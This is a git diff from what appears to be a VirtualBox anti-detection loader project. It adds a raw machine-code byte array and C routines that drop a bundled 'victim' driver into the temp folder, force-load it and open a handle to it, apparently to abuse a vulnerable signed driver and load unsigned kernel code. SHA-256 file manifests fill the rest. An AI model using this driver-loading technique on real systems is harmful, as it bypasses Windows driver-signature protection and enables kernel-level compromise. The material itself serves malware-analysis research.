+ 0xC0, 0xE9, 0xB3, 0x00, 0x00, 0x00, 0x48, 0xB8, 0xFF, 0xFF, 0xFF, 0xFF, 0xFF, 0x7F, 0x00, 0x00,
+ 0x48, 0x3B, 0xF8, 0x72, 0x0A, 0xB8, 0x18, 0x00, 0x00, 0xC0, 0xE9, 0x9A, 0x00, 0x00, 0x00, 0x45,
+ 0x33, 0xC0, 0x33, 0xD2, 0x48, 0x8B, 0xCB, 0x41, 0xFF, 0x57, 0x70, 0xF6, 0x43, 0x0A, 0x05, 0x74,
+ 0x06, 0x4C, 0x8B, 0x63, 0x18, 0xEB, 0x20, 0xC7, 0x44, 0x24, 0x28, 0x20, 0x00, 0x00, 0x40, 0x44,
+ 0x89, 0x74, 0x24, 0x20, 0x45, 0x33, 0xC9, 0x33, 0xD2, 0x45, 0x8D, 0x41, 0x01, 0x48, 0x8B, 0xCB,
+ 0x41, 0xFF, 0x57, 0x78, 0x4C, 0x8B, 0xE0, 0x4D, 0x85, 0xE4, 0x74, 0x31, 0xBA, 0x04, 0x00, 0x00,
+ 0x00, 0x48, 0x8B, 0xCB, 0x41, 0xFF, 0x57, 0x58, 0x44, 0x8B, 0xF0, 0x89, 0x44, 0x24, 0x30, 0x48,
+ 0x8B, 0xCE, 0x49, 0x8B, 0xFC, 0x49, 0x8B, 0xF5, 0xF3, 0xA4, 0x48, 0x8B, 0xD3, 0x49, 0x8B, 0xCC,
+ 0x41, 0xFF, 0x57, 0x60, 0x48, 0x8B, 0xCB, 0x41, 0xFF, 0x57, 0x68, 0xEB, 0x0B, 0x41, 0xBE, 0x05,
+ 0x00, 0x00, 0xC0, 0x44, 0x89, 0x74, 0x24, 0x30, 0xEB, 0x15, 0x41, 0xBE, 0x05, 0x00, 0x00, 0xC0,
+ 0x44, 0x89, 0x74, 0x24, 0x30, 0x4C, 0x8B, 0x7C, 0x24, 0x70, 0x48, 0x8B, 0x5C, 0x24, 0x38, 0x48,
+ 0x8B, 0xCB, 0x41, 0xFF, 0x57, 0x20, 0x41, 0x8B, 0xC6, 0x48, 0x8B, 0x5C, 0x24, 0x78, 0x48, 0x8B,
+ 0xB4, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48, 0x83, 0xC4, 0x40, 0x41, 0x5F, 0x41, 0x5E, 0x41, 0x5D,
+ 0x41, 0x5C, 0x5F, 0xC3, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC, 0xCC,
+ 0x48, 0x89, 0x5C, 0x24, 0x10, 0x48, 0x89, 0x6C, 0x24, 0x18, 0x56, 0x57, 0x41, 0x56, 0x48, 0x83,
+ 0xEC, 0x40, 0x48, 0xB8, 0x1A, 0xC0, 0xED, 0x1C, 0xDE, 0xC0, 0x37, 0x13, 0x49, 0x8B, 0xF0, 0x48,
+ 0x89, 0x44, 0x24, 0x60, 0x48, 0x8B, 0xEA, 0x48, 0x8B, 0x44, 0x24, 0x60, 0x4C, 0x8B, 0xF1, 0xF0,
+ 0xFF, 0x40, 0x04, 0x33, 0xFF, 0xC7, 0x44, 0x24, 0x20, 0x56, 0x00, 0x42, 0x00, 0xC7, 0x44, 0x24,
+ 0x24, 0x6F, 0x00, 0x78, 0x00, 0x8B, 0xDF, 0xC7, 0x44, 0x24, 0x28, 0x44, 0x00, 0x44, 0x00, 0xC7,
+ 0x44, 0x24, 0x2C, 0x2E, 0x00, 0x64, 0x00, 0xC7, 0x44, 0x24, 0x30, 0x6C, 0x00, 0x6C, 0x00, 0x66,
+ 0x89, 0x7C, 0x24, 0x34, 0x48, 0x85, 0xC9, 0x0F, 0x84, 0xF6, 0x00, 0x00, 0x00, 0x4D, 0x85, 0xC0,
+ 0x0F, 0x84, 0xED, 0x00, 0x00, 0x00, 0x48, 0x8B, 0x44, 0x24, 0x60, 0xFF, 0x50, 0x40, 0x48, 0x3B,
+ 0xC5, 0x0F, 0x85, 0xDC, 0x00, 0x00, 0x00, 0x4D, 0x8B, 0x4E, 0x08, 0x4D, 0x85, 0xC9, 0x0F, 0x84,
+ 0xCF, 0x00, 0x00, 0x00, 0x41, 0x0F, 0xB7, 0x06, 0x66, 0x85, 0xC0, 0x0F, 0x84, 0xC2, 0x00, 0x00,
+ 0x00, 0x44, 0x8B, 0xC0, 0x8B, 0xCF, 0x41, 0xD1, 0xE8, 0x74, 0x1B, 0x49, 0x8B, 0xD1, 0x66, 0x90,
+ 0xFF, 0xC1, 0x66, 0x83, 0x3A, 0x5C, 0x48, 0x8D, 0x52, 0x02, 0x8B, 0xC1, 0x0F, 0x45, 0xC3, 0x8B,
+ 0xD8, 0x41, 0x3B, 0xC8, 0x72, 0xEA, 0x4C, 0x8B, 0x54, 0x24, 0x60, 0x48, 0x8D, 0x44, 0x24, 0x20,
+ 0x49, 0xC7, 0xC0, 0xFF, 0xFF, 0xFF, 0xFF, 0x66, 0x0F, 0x1F, 0x84, 0x00, 0x00, 0x00, 0x00, 0x00,
+ 0x49, 0xFF, 0xC0, 0x66, 0x42, 0x39, 0x3C, 0x40, 0x75, 0xF6, 0x8B, 0xC3, 0x48, 0x8D, 0x54, 0x24,
+ 0x20, 0x49, 0x8D, 0x0C, 0x41, 0x41, 0xFF, 0x52, 0x08, 0x85, 0xC0, 0x75, 0x66, 0x48, 0x8B, 0x5C,
+ 0x24, 0x60, 0x48, 0x8B, 0x44, 0x24, 0x60, 0x48, 0x81, 0xC3, 0x8C, 0x00, 0x00, 0x00, 0x83, 0xB8,
+ 0x88, 0x00, 0x00, 0x00, 0x05, 0x76, 0x4C, 0x0F, 0xB6, 0x4B, 0x04, 0x84, 0xC9, 0x74, 0x1C, 0x44,
+ 0x8B, 0x03, 0x48, 0x8D, 0x53, 0x05, 0x4C, 0x03, 0x46, 0x08, 0x44, 0x8B, 0xC9, 0x48, 0x8B, 0x4C,
+ 0x24, 0x60, 0xE8, 0x99, 0xFD, 0xFF, 0xFF, 0x0F, 0xB6, 0x4B, 0x04, 0x0F, 0xB6, 0xC1, 0x83, 0xC0,
+ 0x05, 0x03, 0xF8, 0x0F, 0xB6, 0xC1, 0x48, 0x83, 0xC0, 0x05, 0x48, 0x03, 0xD8, 0x48, 0x8B, 0x44,
+ 0x24, 0x60, 0x8B, 0x88, 0x88, 0x00, 0x00, 0x00, 0x8B, 0xC7, 0x48, 0x83, 0xC0, 0x05, 0x48, 0x3B,
+ 0xC1, 0x72, 0xB4, 0x48, 0x8B, 0x44, 0x24, 0x60, 0x48, 0x8B, 0x5C, 0x24, 0x68, 0x48, 0x8B, 0x6C,
+ 0x24, 0x70, 0xF0, 0xFF, 0x48, 0x04, 0x48, 0x83, 0xC4, 0x40, 0x41, 0x5E, 0x5F, 0x5E, 0xC3
+};
\ No newline at end of file
diff --git a/Source/Zekamashi_v2/loader/victim.c b/Source/Zekamashi_v2/loader/victim.c
new file mode 100644
index 0000000..977f87a
--- /dev/null
+++ b/Source/Zekamashi_v2/loader/victim.c
@@ -0,0 +1,204 @@
+/*******************************************************************************
+*
+* (C) COPYRIGHT AUTHORS, 2018 - 2020
+*
+* TITLE: VICTIM.C
+*
+* VERSION: 1.00
+*
+* DATE: 24 Jan 2020
+*
+* Victim support routines.
+*
+* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
+* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
+* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
+* PARTICULAR PURPOSE.
+*
+*******************************************************************************/
+
+#include "global.h"
+
+/*
+* VictimLoadUnload
+*
+* Purpose:
+*
+* Load/Unload driver using Native API.
+* This routine will try to force unload driver on loading if Force parameter set to TRUE.
+*
+*/
+BOOL VictimLoadUnload(
+ _In_ LPWSTR Name,
+ _In_ LPWSTR ImagePath,
+ _In_ BOOLEAN Force,
+ _In_ BOOLEAN Unload,
+ _Out_opt_ NTSTATUS* ErrorStatus)
+{
+ NTSTATUS ntStatus;
+
+ if (Unload) {
+ ntStatus = supUnloadDriver(Name, TRUE);
+ }
+ else {
+ ntStatus = supLoadDriver(Name, ImagePath, Force);
+ }
+
+ if (ErrorStatus)
+ *ErrorStatus = ntStatus;
+
+ return (NT_SUCCESS(ntStatus));
+}
+
+/*
+* VictimBuildName
+*
+* Purpose:
+*
+* Create filepath to %temp% with given victim name.
+*
+*/
+LPWSTR VictimBuildName(
+ _In_ LPWSTR VictimName
+)
+{
+ LPWSTR FileName;
+ SIZE_T Length = (1024 + _strlen(VictimName)) * sizeof(WCHAR);
+
+ FileName = (LPWSTR)supHeapAlloc(Length);
+ if (FileName == NULL) {
+ SetLastError(ERROR_NOT_ENOUGH_MEMORY);
+ }
+ else {
+
+ DWORD cch = supExpandEnvironmentStrings(L"%temp%\\", FileName, MAX_PATH);
+ if (cch == 0 || cch > MAX_PATH) {
+ SetLastError(ERROR_NOT_ENOUGH_MEMORY);
+ supHeapFree(FileName);
+ FileName = NULL;
+ }
+ else {
+ _strcat(FileName, VictimName);
+ _strcat(FileName, L".sys");
+ }
+ }
+
+ return FileName;
+}
+
+/*
+* VictimCreate
+*
+* Purpose:
+*
+* Drop, load and reference victim driver.
+*
+*/
+BOOL VictimCreate(
+ _In_ HINSTANCE ModuleBase,
+ _In_ LPWSTR Name, //same as device name
+ _In_ ULONG ResourceId,
+ _Out_opt_ PHANDLE VictimHandle)
+{
+ PBYTE drvBuffer = NULL;
+ ULONG resourceSize = 0;
+ LPWSTR driverFileName = NULL;
+ HANDLE deviceHandle = NULL;
+
+ if (VictimHandle)
+ *VictimHandle = NULL;
+
+ driverFileName = VictimBuildName(Name);
+ if (driverFileName) {
+
+ do {
+
+ if (supIsObjectExists((LPWSTR)L"\\Device", Name)) {
+ printf_s("LDR: Victim driver already loaded, force reload\r\n");
+
+ printf_s("LDR: Attempt to unload %ws\r\n", Name);
+
+ NTSTATUS ntStatus;
+ if (!VictimLoadUnload(Name, driverFileName, FALSE, TRUE, &ntStatus)) {
+ printf_s("[!] Could not force unload victim, NTSTATUS(0x%lX) abort\r\n", ntStatus);
+ break;
+ }
+ else {
+ printf_s(T_PRNTDEFAULT, "LDR: Previous instance of victim driver unloaded");
+ }
+ }
+
+ drvBuffer = supQueryResourceData(ResourceId, ModuleBase, &resourceSize);
+ if (drvBuffer == NULL) {
+ SetLastError(ERROR_FILE_NOT_FOUND);
+ break;
+ }
+
+ NTSTATUS ntStatus;
+
+ printf_s("LDR: Extracting victim driver \"%ws\" as \"%ws\"\r\n", Name, driverFileName);
+
+ if (resourceSize != (ULONG)supWriteBufferToFile(driverFileName,
+ drvBuffer,
+ resourceSize,
+ TRUE,
+ FALSE,
+ &ntStatus))
+ {
+ printf_s("[!] Could not extract victim driver, NTSTATUS(0x%lX) abort\r\n", ntStatus);
+ SetLastError(RtlNtStatusToDosError(ntStatus));
+ break;
+ }
+
+ ntStatus = STATUS_UNSUCCESSFUL;
+ if (VictimLoadUnload(Name, driverFileName, TRUE, FALSE, &ntStatus)) {
+
+ SetLastError(RtlNtStatusToDosError(ntStatus));
+
+ if (VictimHandle) {
+
+ ntStatus = supOpenDriver(Name, &deviceHandle);
+ if (NT_SUCCESS(ntStatus)) {
+ *VictimHandle = deviceHandle;
+ }
+ else {
+ SetLastError(RtlNtStatusToDosError(ntStatus));
+ }
+ }
+
+ }
+ else {
+ SetLastError(RtlNtStatusToDosError(ntStatus));
+ }
+
+ } while (FALSE);
+
+ supHeapFree(driverFileName);
+ }
+
+ return (deviceHandle != NULL);
+}
+
+/*
+* VictimRelease
+*
+* Purpose:
+*
+* Unload victim driver.
+*
+*/
+BOOL VictimRelease(
+ _In_ LPWSTR Name
+)
+{
+ BOOL bResult = FALSE;
+
+ LPWSTR driverFileName = VictimBuildName(Name);
+ if (driverFileName) {
+ bResult = VictimLoadUnload(Name, driverFileName, FALSE, TRUE, NULL);
+ DeleteFile(driverFileName);
+ supHeapFree(driverFileName);
+ }
+
+ return bResult;
+}
diff --git a/Source/Zekamashi_v2/loader/victim.h b/Source/Zekamashi_v2/loader/victim.h
new file mode 100644
index 0000000..fb6af50
--- /dev/null
+++ b/Source/Zekamashi_v2/loader/victim.h
@@ -0,0 +1,29 @@
+/*******************************************************************************
+*
+* (C) COPYRIGHT AUTHORS, 2018 - 2020
+*
+* TITLE: VICTIM.H
+*
+* VERSION: 1.00
+*
+* DATE: 07 Jan 2020
+*
+* Victim support prototypes and definitions.
+*
+* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
+* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
+* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
+* PARTICULAR PURPOSE.
+*
+*******************************************************************************/
+
+#pragma once
+
+BOOL VictimCreate(
+ _In_ HINSTANCE ModuleBase,
+ _In_ LPWSTR Name, //same as device name
+ _In_ ULONG ResourceId,
+ _Out_opt_ PHANDLE VictimHandle);
+
+BOOL VictimRelease(
+ _In_ LPWSTR Name);
diff --git a/VBoxHardenedLoader.sha256 b/VBoxHardenedLoader.sha256
new file mode 100644
index 0000000..b8a6781
--- /dev/null
+++ b/VBoxHardenedLoader.sha256
@@ -0,0 +1,77 @@
+d9fc9680e59ecf891c6472db3c4fe7e8fea5ccc6861e00d71150e7bd87aae720 *Binary\howto.md
+f722b23ba22e1eb66cfd441c1f2bab8245cc623d6e8881da87ca3bffe0aaedbd *Binary\linux.md
+f0a867a9f238f0ecef1cc81f5e1fa4daa333b4a8a26ca490798e8e269bb24cbe *Binary\loader.exe
+07c63ac8ab15ee31fda7239ad4677e1df6e96b7a7691bfb4c540f51653fc9aa4 *Binary\support.txt
+8b0abfc673b112d9f03f72fd290e458fc1287a9951fca1ec4ee7073c510b0dd2 *Binary\data\ACPI-DSDT.bin
+cb0f64b49b41ae8f9d88b9704372c55e2c900296bee166a4bd460c7c7b0e1b9b *Binary\data\ACPI-SSDT.bin
+ebbcf51c60a02b8dc798d791f95a884b42feeeef6a9f51a1c8c3bed16f579271 *Binary\data\efi_amd64_fixed_6.1.2.fd
+d031f2dd0043f10b76801c77d68ca0895ec737f3279f42c9fd71b1b9cdc590eb *Binary\data\hidevm_ahci.cmd
+2612137360243c45fd38e7bfc522184b45045365bd5826a5a14850d8e5de886f *Binary\data\hidevm_efiahci.cmd
+6b7ea23a762ae3aa7c095f6f4016038d0382eb35c57a73a87494b17ab0978792 *Binary\data\hidevm_efiide.cmd
+6ca1ddae38e050fae56d541b92e8f0b733351ee26a85f233a1815d15ff1bcf4a *Binary\data\hidevm_ide.cmd
+df58faf9bb13d4871e7c21cd2d8c8efed0d65553159f921c486bb2487b687715 *Binary\data\pcbios386.bin
+96db5da69d9d7dc09dc82fb50c10f6101e632fb99c06ee4e18a8c6ad2100eb6c *Binary\data\splash.bmp
+f6173b695338900a97bb335ae4496505b0e6ed5b917ce9e97b0ff3b6e58352f3 *Binary\data\vgabios386.bin
+43614aaf5eb4f9b548dc67e68c99564c0b838f2a1a4317d17c8d924370f5ab80 *Binary\data\linux\hidevm_bios.sh
+3591c6110bbba064f317c84c737d006aa077afa183f7a8d5feb274375c6f892e *Binary\data\linux\hidevm_efi.sh
+018266ab511243b3ac2e1ff71befef091909dc59cbbfa656725ba97eb8c32b81 *Binary\data\linux\readme.txt
+7de042d3c3194acb5081f0f65b208f739ae9eb2fe38028c75daaf7e16bd1c9ff *Binary\help\10_script.png
+6eaba9d2cb90c26d95bdb72e2079b6a3e237ce1cd117fe9799fe376067b9fede *Binary\help\11_loader_before.png
+1e358f116d7fe3dd1100333b1c6ab1af077fa5d7a818f7ea396fcd9966a5885b *Binary\help\12_loader_after.png
+07cb1d1d1d3155913f2ef0bdfb25a479f1e1e4fd87b65f92e3e4e0ac829577de *Binary\help\1_install.png
+30f65c67d518442eec8de3ddf51d266c7255898514e42f4bf0d13d854fdfff26 *Binary\help\2_createvm.png
+19abe5eb41802336f3f707c1ca9fdb95610e193dcc4e1226f886b5dfd61de719 *Binary\help\3_createhdd.png
+0ab3d9e0e2424c7376ffb1452bf0271627e7194b5559dd93ab87d573e72a1c2b *Binary\help\4_settings_mb.png
+958f31557370f70d8866134f181b91e987b2f30269eb9974ef0abed08d8bc632 *Binary\help\5_settings_cpu.png
+1e92efb7a77aca80ce45b836941edaf51e9d0859cbcc2a0a233a0631cf0fdef8 *Binary\help\6_settings_accel.png
+187377109de3ce610d7c85febb550194260522a7c7ee5553f6dea7c23f64f8ae *Binary\help\7_display.png
+bba17669445671d1615e974328fd5a7df35f4572b26bfc5656b5aaad4b92517a *Binary\help\7_display2.png
+da60acc37c2fd78676d3ff18a199d740b73a80368912d0ebb0e7250de88d6e7d *Binary\help\8_storage.png
+c67f7a54392551f91d836bd52fa41310657d343cdcc2c7342983aa5e94b2d0d0 *Binary\help\9_network.png
+4bf5ef7b3cd7525b163b1ceefab29d95995b19ccb9691573b0359171f15cbd76 *Source\Tsugumi_shell\Tsugumi_shell.sln
+661ab1e6d69a0ab1c52e430bc67e85c34fbef383503d73dbe6a7bbdadf5d5e47 *Source\Tsugumi_shell\Tsugumi_shell\fnorder.txt
+ee8b31d381e41237daf258628f3a0b7306871da87448938bfb2d6a03a0bdc25f *Source\Tsugumi_shell\Tsugumi_shell\main.c
+d7f491066ab282b0f65bb71107e9abbe5a4b6f7b7fbe0c10a1901766ebf101ee *Source\Tsugumi_shell\Tsugumi_shell\Tsugumi.h
+547f41bf274e29ad195629f24dae562f5fe26a1101bf002eee9598ba5083111a *Source\Tsugumi_shell\Tsugumi_shell\Tsugumi_shell.vcxproj
+f35b27d946aa1303272413b0793e02af0d8d4f2b620c7b1c9289ad2a85a2774e *Source\Tsugumi_shell\Tsugumi_shell\Tsugumi_shell.vcxproj.filters
+07266f4866de425d0c27fd0d1ddc79c5b7e8ae641851702f7ec3e0ca0e54882b *Source\Tsugumi_shell\Tsugumi_shell\Tsugumi_shell.vcxproj.user
+2432e3e07fc6e9f9059ddede5c9a030d08ba832908189c8b5a77bad1f92d7ac4 *Source\Zekamashi_v2\Zekamashi.sln
+1c1e8000d3ce2fc37dd29079de0ff40cfbcbe6ca6bd5968557efcf882ae243c4 *Source\Zekamashi_v2\loader\consts.h
+5dc1ad50b24831d86f42130c8948005c7c2789841d91a4071e8a13590bc52a9d *Source\Zekamashi_v2\loader\drvmap.c
+9e50bcf51c31a9ad303ba994591e0ffdccfa9c0e652c3ec434bd66224a5598c0 *Source\Zekamashi_v2\loader\drvmap.h
+0375979f5c0d5a9f03b73c613650e58dd6d876dd331dabf1bb6a219a4666ea73 *Source\Zekamashi_v2\loader\global.h
+1209f62c2a36eda03bfb4b57766797b1dbb39d5062eed8f228ab4a525b1f3806 *Source\Zekamashi_v2\loader\loader.vcxproj
+0c626683d96f53a91c96349c4b5f11986cefd56f242c2b85c1e2b6c77f8624d5 *Source\Zekamashi_v2\loader\loader.vcxproj.filters
+e370cf3ee7cfdb30f92017530c597e1a71db422a362ae646abd7e00dfca7ccbe *Source\Zekamashi_v2\loader\loader.vcxproj.user
+cc058ba07850a583c68f8f280e62ae47f09950ac89bae5adb5d24c31258ca2f8 *Source\Zekamashi_v2\loader\main.c
+df328b27c089423e589264fe5ed1c48c4de258facda4124ba4bc18378bfa04e1 *Source\Zekamashi_v2\loader\oscompat.manifest
+39014dc5597d9bbae619b663fe7feb339211fe99f2e8397bca187bab55ee98ca *Source\Zekamashi_v2\loader\patterns.c
+8117b440f7945c6ec9036d38ce590d6384e8bdd748a76eaac04545a9be1b238b *Source\Zekamashi_v2\loader\patterns.h
+54cf61f71c7fff27bd4c771885f88dae20a0f26cd24b880f427410232fe6b17f *Source\Zekamashi_v2\loader\resource.h
+f84a9a6a850a36fcae58cbabccb9e54d51e6c91c7065682fe553e06d9586ae08 *Source\Zekamashi_v2\loader\Resource.rc
+74a159814e524e6c83e9c456713185049b547da62edc87a6c6653d33166c99e4 *Source\Zekamashi_v2\loader\sup.c
+819a1a9b26f3c4f8f9e0ef1a711495d0934c3691836a3a032aaf786657954d95 *Source\Zekamashi_v2\loader\sup.h
+26fc44939eac3a5b0a799f8b8be8e54cb0009c39dd8929b5a3f8b0bc9d8f5646 *Source\Zekamashi_v2\loader\tsmisc.h
+9b015373fe2823dd05fdda2dc0fe943c2b587bbb35c608f90506c620fe4d6a4a *Source\Zekamashi_v2\loader\victim.c
+f26fc0e6c1267c30701d8d2cf137bd7a191ddbbd4bcff691cef98fd060cbebcb *Source\Zekamashi_v2\loader\victim.h
+4429f32db1cc70567919d7d47b844a91cf1329a6cd116f582305f3b7b60cd60b *Source\Zekamashi_v2\loader\drv\iQVM64.sys
+9b6a84f7c40ea51c38cc4d2e93efb3375e9d98d4894a85941190d94fbe73a4e4 *Source\Zekamashi_v2\loader\drv\procexp.sys
+53a7ce27591e040b63880a3dd326b8ba8c97a0fa34d5e2d32aba89a0147434f6 *Source\Zekamashi_v2\loader\hde\hde64.c
+e99aa4997bda14b534c614c3d8cb78a72c4aca91a1212c8b03ec605d1d75e36e *Source\Zekamashi_v2\loader\hde\hde64.h
+f8e6a0be357726bee35c7247b57408b54bb38d94e8324a6bb84b91c462b2be30 *Source\Zekamashi_v2\loader\hde\pstdint.h
+b774446d2f110ce954fb0a710f4693c5562ddbd8d56fe84106f2ee80db8b50a2 *Source\Zekamashi_v2\loader\hde\table64.h
+d06b7f3a6daf9487f544bb98a32695258d6cb5a1579d745d65e6e37d263e804f *Source\Zekamashi_v2\loader\idrv\nal.c
+1214eec7d324c0b305782b151f3c4064c568c7ad26487df70cf4455640760ef4 *Source\Zekamashi_v2\loader\idrv\nal.h
+28eae019e74dfd55cb5a86e3fa6cb87779ea70bfa281f6593a809b63858019eb *Source\Zekamashi_v2\loader\minirtl\cmdline.c
+a108a76d0b5113772c20f7329eaeac490dab2f9ce0b7beaeea5fe80bbdb041cf *Source\Zekamashi_v2\loader\minirtl\cmdline.h
+757523eaa1838f873e41bdeea69c839d21aa8a8e0c96c1918121ea86a222267f *Source\Zekamashi_v2\loader\minirtl\minirtl.h
+82bdda67972f1b07b8c486208cf782f2a75e8efab0eb66c089e64f03b35aeb77 *Source\Zekamashi_v2\loader\minirtl\rtltypes.h
+d0c65008262381fd065ba8c364cfa5cf8b471c363bf385e3a468fa53945af918 *Source\Zekamashi_v2\loader\minirtl\ultohex.c
+c902616e5949b38a2700741c775417f9a52270a469864d9ef033664682bdc458 *Source\Zekamashi_v2\loader\minirtl\_strcat.c
+2a67c7690ec6df8e233207116b0e4fe76c02ae43595d9e606e123572b6ac88a1 *Source\Zekamashi_v2\loader\minirtl\_strcmp.c
+1e903e3ac78a19475b485f6408d455f6258ee8f1f3a5d3b2e8b4c972bd32bc00 *Source\Zekamashi_v2\loader\minirtl\_strcmpi.c
+43c13acfea0213bc1651f11f42d55f2830447e149ad6176326ba8226e4c9d3e6 *Source\Zekamashi_v2\loader\minirtl\_strcpy.c
+9fa6411f94c8a3866b887823569337bdb29796056f8cadb89791d84933d6861c *Source\Zekamashi_v2\loader\minirtl\_strend.c
+213f8bc30a76ead3c8a60b61cc46c76a873f06f7c0bb473effeb584a6588a308 *Source\Zekamashi_v2\loader\minirtl\_strlen.c
+0434d69daa20fbf87d829ffc17e43dcc2db3386aff434af888011fdec2f645a4 *Source\Zekamashi_v2\loader\minirtl\_strncpy.c
+0e1535a719ececda767b7e0e049170a4eb375329a730973f87a681dc8bd9392a *Source\Zekamashi_v2\loader\ntdll\ntos.h
diff --git a/VBoxLdr.sha256 b/VBoxLdr.sha256
deleted file mode 100644
index bf63f89..0000000
--- a/VBoxLdr.sha256
+++ /dev/null
@@ -1,121 +0,0 @@
-3bcf99c27fb6a3e0d8d7153585185efe796352e6c5d36ceeee8c8fa2ac45d057 *Binary\install.cmd
-7bb4486a4fbb951470787e9a2c1fa6b02923a2b1a99025b67dda432b49685041 *Binary\install.md
-aa27115b07b9dd97211ad5485080758c378b09882fd829d423e75f0ce91d096c *Binary\install_signed.md
-e5c6f865530446cd7d921f3af89bd42949a88c90e54f199f5ccb625e2e27fb05 *Binary\linux.md
-25bf609cb5017a007a6c60c0d3f2ee4cf494cac6652f94acf743de2a052e6570 *Binary\loader.cmd
-e98af50c4e897bd1e6bdd58377481a19f976b1d7b7889aabace562ebce7ddae5 *Binary\loader.exe
-0d1e0c1e14b614ed3b156d0f43ed7cdb872cb5b967ed70c0ba501e3cbc2daca2 *Binary\tdl.exe
-8d0bfe64cfde7a5c34f002c7f101a81df562c6f2217fea9ca4ce89980356434e *Binary\Tsugumi.sys
-ac8bd71b0bbbf083b83d104b710f09da857fc310a8c23f99a5fa910160a3c4b6 *Binary\data\ACPI-DSDT.bin
-e22b989cc06c01d30bda80267cecf99ba5def9cc106a920ee2b37a6d01a2d83e *Binary\data\ACPI-SSDT1.bin
-3e762c298adae7a45bf7e708fe95041d74f917fac80bff8cb6242d25561657aa *Binary\data\hidevm_ahci.cmd
-79ab4b06911110af010b5dff3fd35143de6215e21b3e1e7d265ee5eec9e1d64f *Binary\data\hidevm_efiahci.cmd
-fb13c37b08df4a80c8c0c6e31b7b6a7e08806b09ceb9e867ea74e583ceb79424 *Binary\data\hidevm_efiide.cmd
-65a2dc1ea8c40d604a78525a3563593b9b11ea2d2e70c387b52980b18248666b *Binary\data\hidevm_ide.cmd
-a9e207b4d52b9f70237aadd658bd24bebfb7e3c669895034e3d0a7b70c76d3d6 *Binary\data\pcbios.bin
-4e01f7906ad056ee591920d086102e3e2e928f1168a2b15a56538925cdd370b3 *Binary\data\pxerom.bin
-96db5da69d9d7dc09dc82fb50c10f6101e632fb99c06ee4e18a8c6ad2100eb6c *Binary\data\splash.bmp
-19f0ae97ab97df2296e2245da5858afb94080df6e38104db11104a37ae6cf3aa *Binary\data\VBoxEFI64-6.0.0.fd
-c0fd6fc2f6c559e31155e9316f5e292fd1573c7068c80426964e388254f0fc20 *Binary\data\VBoxEFI64-6.0.10.fd
-a45af7372ceab4c59ae66a7c2213f1da42ab369001234606aaac8b998fe57d71 *Binary\data\VBoxEFI64-6.0.2.fd
-e593b91fef4125d9e2b9087f095b77fbaad672233feca4ec743d28c0c368ce21 *Binary\data\VBoxEFI64-6.0.4.fd
-44b3658586c406522b3f13d2ed8a44b3165d9b4a99d8620226bc66613515d8b4 *Binary\data\videorom.bin
-b5bdf1f98dce80572af00488fe828bd5c614d1b00b1f2c701a9f626366ea5b69 *Binary\data\5.2.x\ACPI-DSDT.bin
-48dcfde10d68d8cd84eaad6769e487e98e4c31c29aa78ba2dd1a9ab0bc93fbef *Binary\data\5.2.x\ACPI-SSDT1.bin
-3e762c298adae7a45bf7e708fe95041d74f917fac80bff8cb6242d25561657aa *Binary\data\5.2.x\hidevm_ahci.cmd
-79ab4b06911110af010b5dff3fd35143de6215e21b3e1e7d265ee5eec9e1d64f *Binary\data\5.2.x\hidevm_efiahci.cmd
-fb13c37b08df4a80c8c0c6e31b7b6a7e08806b09ceb9e867ea74e583ceb79424 *Binary\data\5.2.x\hidevm_efiide.cmd
-65a2dc1ea8c40d604a78525a3563593b9b11ea2d2e70c387b52980b18248666b *Binary\data\5.2.x\hidevm_ide.cmd
-3100322530613c2549a8cf656b2da7da1f7682f952bf69fdf5b77891de467306 *Binary\data\5.2.x\pcbios.bin
-4e01f7906ad056ee591920d086102e3e2e928f1168a2b15a56538925cdd370b3 *Binary\data\5.2.x\pxerom.bin
-96db5da69d9d7dc09dc82fb50c10f6101e632fb99c06ee4e18a8c6ad2100eb6c *Binary\data\5.2.x\splash.bmp
-4a58991d13f292ae75a5d1954b857263bfa4aba264a2553bb741cd8d737fdd00 *Binary\data\5.2.x\VBoxEFI64_5.2.12.fd
-204c44f88294bad3dd092b45806d89177af8dfcb61cc4526bf0a0c3ad95a3cf4 *Binary\data\5.2.x\VBoxEFI64_5.2.18.fd
-64f6a4a76c4ea5eb0289106e9609878d31d388d39b918cb633ba995f34a97ce4 *Binary\data\5.2.x\VBoxEFI64_5.2.4.fd
-58f48c8bfd34788683244a001de8a5ad90d15da049f721bfbf3ed320bbab92de *Binary\data\5.2.x\videorom.bin
-0b0c6f39c54b2cb7cab707affa99d18b7fa915b05f10b29f5f3053293b6f251d *Binary\help\10_script.png
-3f8cbd6c040c752602d3a42ebcc3e00cf081fe62af17aa2716cb3f37f52c0e36 *Binary\help\11_tdl_tsugumi_before.png
-7b72781a32fd79c7ee7288458f39e3794f63203145bf6f97cc6072be6528ecaf *Binary\help\12_tdl_tsugumi_after.png
-76a65aba0837bb1037c2eab6f168898fdcd83a748102dc62f4a5eb07240615cf *Binary\help\13_loader_help.png
-3bd0b5d973956242f2ef64d6224e5fce38f20f8f781d5291021ccccecd047e56 *Binary\help\14_loader_start.png
-1ecb44d1ca5d42df636ceeb3068b66eb55c462fb82fddeb452c453124003c91f *Binary\help\15_loader_signed.png
-f4d27552ca678b863fe3de39910342c469c379e50018247fbb60900f1532601b *Binary\help\1_install.png
-82cdc3d970dd5854e1373cf0f12d5cae8d09f6dd18e2ab4ad0ed84f13c09900d *Binary\help\2_createvm.png
-585f1ed4eee7c38157c18c9bcad0addd13501a76ae4c22c830c27d819e39d60c *Binary\help\3_createhdd.png
-9abb548fef23b65e3fcd94f4018b3f1f82ecbf0eeaeef2f27216891ef6b6c5ec *Binary\help\4_settings_mb.png
-a3b04f2bde25f22b0dc9ccd4d55455bf7e1a1ba05f9da3e6ac038db5ea1a6d90 *Binary\help\5_settings_cpu.png
-19effb249bc34e8b764a4186ca2e406ed9056ed43796941926db812afb0512f6 *Binary\help\6_settings_accel.png
